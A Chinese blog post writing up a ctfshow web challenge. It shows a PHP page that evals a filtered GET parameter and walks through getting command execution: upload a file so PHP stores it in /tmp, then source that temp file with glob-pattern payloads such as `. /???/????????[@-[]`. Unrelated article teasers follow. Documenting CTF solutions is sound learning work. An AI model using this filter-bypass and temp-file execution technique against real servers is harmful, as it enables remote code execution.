CTFSHOW 红包题第二弹 web_ctfshow 辟邪剑谱_Je3Z的博客-程序员秘密

技术标签： ctf web

利用临时文件的命令执行

临时文件的命名规则

在上传存储到临时目录后，临时文件命名的规则如下:
默认为 php+4或者6位随机数字和大小写字母
php[0-9A-Za-z]{3,4,5,6}
比如：phpXXXXXX.tmp 在windows下有tmp后缀，linux没有。

PHP上传机制

php文件上传时会先将上传的文件保存到upload_tmp_dir该配置目录下，这里为/tmp，而上传页面只负责把该文件拷贝到目标目录。也就是说不管该php页面有没有文件上传功能，我们只要上传了文件，该文件就会被上传到upload_tmp_dir配置的目录下，上传完后会被删除。

在这里插入图片描述

<?php
#error_reporting(0);
?>
<html lang="zh-CN">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width  minimum-scale=1.0  maximum-scale=1.0  initial-scale=1.0" />
    <title>ctf.show_红包题</title>
</head>
<body>
    <center>
    <h2>ctf.show_红包题</h2>
    <h4>where is the flag?</h4>
    </center>
    <!-- hint:?cmd= -->
    <?php
        if(isset($_GET['cmd'])){
    
            $cmd=$_GET['cmd'];
            highlight_file(__FILE__);
            if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){
    
            
                die("cerror");
            }
            if(preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\（|\）|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)){
    
                die("serror");
            }
            eval($cmd);
        
        }
    
     ?>

</body>
</html>

if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){

可以用p字母，有蹊跷。。。。
然后用的方法就是执行临时文件。

<!DOCTYPE html>
<html>
<body>
<form action="http://356c8675-3004-4ae6-8ea1-0d372a6f683b.challenge.ctf.show:8080/" method="POST" enctype="multipart/form-data">
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>

将这个写入题目html，然后抓包
在这里插入图片描述
linux .(点命令)：读取并且在当前的shell中执行文件中的命令
source命令可简写为一个点.。

?cmd=?><?=`.%20/??p/p?p??????`;

后面是搬的p神的一些东西
在这里插入图片描述
所有文件名都是小写，只有PHP生成的临时文件包含大写字母。那么答案就呼之欲出了，我们只要找到一个可以表示“大写字母”的glob通配符，就能精准找到我们要执行的文件。

翻开ascii码表，可见大写字母位于@与[之间：
在这里插入图片描述
那么，我们可以利用[@-[]来表示大写字母：

当然，php生成临时文件名是随机的，最后一个字符不一定是大写字母，不过多尝试几次也就行了。

index.php?code=?><?=`. /???/????????[@-[]`;?>

在这里插入图片描述

题总结
题上生成的临时文件名格式是php[A-Za-z]{6}
然后每次请求，临时文件都会变(之前上传的文件就被删除)
在这里插入图片描述

在这里插入图片描述

然后这个题用不了p神的那个payload,被过滤一些字符。

本文链接：https://blog.csdn.net/jvkyvly/article/details/118734918

原作者删帖不实内容删帖广告或垃圾文章投诉

智能推荐

Android Button 的默认隐藏属性_button 隐藏属性_小码农·李的博客-程序员秘密

最近发现在默认添加Button控件的时候，text属性上会默认使用全部大写的英文。那么想要原文展示应该设置那个属性呢？特此记录1、在Android开发中，会常常用到Button这个控件，但在设置text文本显示的时候，跟我们想要的效果不一样。2、如在xml中使用Button控件的时候：android:id="@+id/btnLogin"android:layout_width=“match...

路由器04--OPKG_aoyi2011的博客-程序员秘密

1.简介https://oldwiki.archive.openwrt.org/doc/techref/opkgOpkg 是一个基于 ipkg 的轻量级的软件包管理系统，主要用于嵌入式系统，目前应用opkg的有Open WRT 和 Open Embedded。1Opkg的详细使用方法可以参考OpenWRT的 WIKI页面，不再赘述，本文将重点解释opkg的工作原理。...

【unity】高亮物体_unity 高亮模型_DJames23的博客-程序员秘密

脚本及效果文件下载：链接：https://pan.baidu.com/s/1UU1j976qK_dfPA4PKr8W4w提取码：yy04使用方法1.导入unitypackage2.在Main camera上添加 HighlightingEffect脚本3.给需要高亮的物体添加 HighlightableObject脚本4.编写High.cs脚本并将其挂载到任一物体（比如Light）上，脚本如下：...

C++万能头文件(真心佩服!)_我自是年少韶华倾负的博客-程序员秘密

#include&lt;bits/stdc++.h&gt; 调用此头文件相当于//c#ifndef _GLIBCXX_NO_ASSERT#include&lt;cassert&gt;#endif#include&lt;cctype&gt;#include&lt;cerrno&gt;#include &lt;cfloat&gt;#include &lt;ciso646&...

Tomcat启动startup.bat闪退和JRE_HOME错误_zJianFlys的博客-程序员秘密

先是报个错，无法启动，基本意思就是64bit的Tomcat无法安装在32bit上去，但是我这个电脑是64的，网上搜了一下，是jre的问题，一会再写个安装问题的解答，先说这个。配置好Java环境变量后（还有JRE_HOME ，值为jdk下jre路径，网上是这么说的我配置没好用，先配着吧，可能别人会好用呢。）启动Tomcat(双击Tomcat的bin目录下的startup.ba

机器学习（二）：感知器算法剖析及Python实现_罗森布拉特感知器学习算法_远观钱途的博客-程序员秘密

前言：上一篇已经初步介绍了机器学习相关知识，简短介绍了机器学习的分类等等，本篇介绍其中监督学习中的分类领域下的感知器算法。本篇将循序渐进的实现一个感知器，并且通过训练使其具备对鸢尾花数据集中数据进行分类的能力。早期机器学习-人造神经元在详细讨论感知器和相关算法之前，先大体了解一下早期机器学习的起源。为了理解大脑的工作原理以涉及人工智能系统，沃伦*麦卡洛克和沃尔特*皮茨在1943年...